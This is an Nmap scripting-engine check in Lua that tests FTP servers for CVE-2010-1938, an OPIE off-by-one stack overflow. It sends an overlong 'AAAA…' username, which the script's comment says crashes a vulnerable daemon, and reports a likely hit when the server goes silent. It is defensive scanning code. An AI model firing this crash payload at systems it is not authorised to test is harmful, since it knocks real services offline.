description = [[
Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow).
Vulnerability discovered by Maksymilian Arciemowicz and Adam 'pi3' Zabrocki

]]
   
---
-- @output
-- PORT   STATE SERVICE
-- 21/tcp open  ftp
-- | ftp-libopie: Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)
-- |_See http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

   
author = "Ange Gutek"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"intrusive"}
   
require "shortport"
   
portrule = shortport.port_or_service(21, "ftp")
   

action = function(host, port)
local socket = nmap.new_socket()
local result
-- If we use more that 31 chars for username, ftpd will crash (quoted from the advisory).
local user_account = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
local status = true

local err_catch = function()
socket:close()
end

local try = nmap.new_try(err_catch)

socket:set_timeout(10000)
try(socket:connect(host.ip, port.number, port.protocol))

-- First, try a safe User so that we are sure that everything is ok
local payload = "USER opie\r\n"
try(socket:send(payload))

status, result = socket:receive_lines(1);
if status and not (string.match(result,"^421")) then
    
    -- Second, try the vulnerable user account
    local payload = "USER " .. user_account .. "\r\n"
    try(socket:send(payload))

    status, result = socket:receive_lines(1);
    if status then
        return
    else
    -- if the server does not answer anymore we may have reached a stack overflow condition
    return "Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)\nSee http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc"
    end
else
return
end
                  
socket:close()

end